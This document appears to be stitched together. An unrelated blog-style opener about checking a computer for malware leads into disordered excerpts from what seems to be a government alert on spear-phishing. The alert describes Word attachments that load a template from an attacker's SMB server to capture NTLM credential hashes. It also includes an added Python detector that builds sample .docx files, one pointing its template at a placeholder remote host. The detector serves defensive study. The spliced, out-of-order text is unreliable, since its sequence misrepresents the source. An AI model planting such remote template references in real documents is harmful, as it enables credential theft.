The Security Tango is my name for the dance you have to do every time you want to assure yourself that your computer is free of viruses, spyware, keystroke loggers, backdoors, trojans, and other forms of malware (click the Definitions button in the menu to see what all those things mean).
As part of Microsoft Word's standard template-loading behavior, this request authenticates the client to the remote SMB server, transmitting the user's NTLM credential hash (the challenge-response material) before the requested file is retrieved.
(Note: the credentials are transferred whether or not the file is actually retrieved; a server that only answers the authentication exchange is enough.) The threat actors then likely used offline password-cracking techniques against the captured hashes to recover the plaintext password.
Historically, threat actors have also targeted other critical infrastructure sectors with similar campaigns.
Analysis by DHS, FBI, and trusted partners has identified distinct indicators and behaviors related to this activity.
Stage 2: Weaponization
Throughout the spear-phishing campaign, threat actors used email attachments that leverage legitimate Microsoft Office functionality to retrieve a document from a remote server using the Server Message Block (SMB) protocol: the attachment's template reference points at a file on an attacker-controlled server rather than on the local machine.
(An example of this request is: file[:]///Normal.dotm).
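As an added example (not part of the original alert text), the following Python script checks a Word document for the weaponization mechanism described above: Word records the attached template in the part word/_rels/settings.xml.rels, and an attachedTemplate relationship whose Target is a file:// URL with a host, a UNC path, or an http(s) URL with TargetMode="External" is what causes Word to open the SMB connection and send the user's NTLM credential hash before any file is retrieved. The sample documents built by build_sample_docx and the 192.0.2.10 address (RFC 5737 documentation range) are constructed here for the demonstration and are not indicators from the alert.

```python
import io
import zipfile
import xml.etree.ElementTree as ET
from urllib.parse import urlsplit

# Relationship type Word uses for the attached (.dotm) template.
ATTACHED_TEMPLATE = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                     "relationships/attachedTemplate")
RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"


def is_remote_target(target):
    """True if a template Target would make Word reach out to another host."""
    if target.startswith("\\\\"):          # UNC path: \\host\share\Normal.dotm
        return True
    parts = urlsplit(target)
    if parts.scheme in ("http", "https"):   # template fetched over WebDAV/HTTP
        return True
    if parts.scheme == "file":
        # file:///C:/... has an empty netloc and stays local;
        # file://host/Normal.dotm has a host and triggers an SMB request.
        return bool(parts.netloc) and parts.netloc.lower() not in ("localhost", "127.0.0.1")
    return False


def find_remote_templates(docx_bytes):
    """Return (rels part, Target) pairs for external attachedTemplate relationships
    that point off-host. Scans every .rels part in the OOXML package."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        for name in z.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(z.read(name))
            for rel in root.iter("{%s}Relationship" % RELS_NS):
                if rel.get("Type") != ATTACHED_TEMPLATE:
                    continue
                target = rel.get("Target", "")
                if rel.get("TargetMode", "Internal") == "External" and is_remote_target(target):
                    hits.append((name, target))
    return hits


def build_sample_docx(template_target, mode="External"):
    """CONSTRUCTED sample: a minimal .docx-style zip carrying one attachedTemplate
    relationship. Real documents contain far more parts; only the .rels matters here."""
    rels = ('<?xml version="1.0" encoding="UTF-8" standalone="yes"?>'
            '<Relationships xmlns="%s">'
            '<Relationship Id="rId1" Type="%s" Target="%s" TargetMode="%s"/>'
            '</Relationships>' % (RELS_NS, ATTACHED_TEMPLATE, template_target, mode))
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<document/>")
        z.writestr("word/settings.xml", "<settings/>")
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Constructed inputs: one weaponized-style reference, one benign local template.
    weaponized = build_sample_docx("file://192.0.2.10/Normal.dotm")
    benign = build_sample_docx("file:///C:/Users/user/AppData/Roaming/Microsoft/Templates/Normal.dotm")
    print("weaponized:", find_remote_templates(weaponized))
    print("benign:", find_remote_templates(benign))
```

The check flags the reference before the document is opened; on the network side the same event shows up as outbound TCP/445 (or WebDAV over 80/443) from a workstation to an external address immediately after an attachment is opened, which is why blocking outbound SMB at the perimeter prevents the hash from ever leaving the network.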
It is known that threat actors are actively accessing publicly available information hosted by organization-monitored networks.
DHS further assesses that threat actors are seeking to identify information pertaining to network and organizational design, as well as control system capabilities, within organizations.
Once actors obtain valid credentials, they are able to masquerade as authorized users.
Stage 3: Delivery
When seeking to compromise the target network, threat actors used a spear-phishing email campaign that differed from previously reported TTPs.
The initial victims are peripheral organizations such as trusted third party suppliers with less secure networks.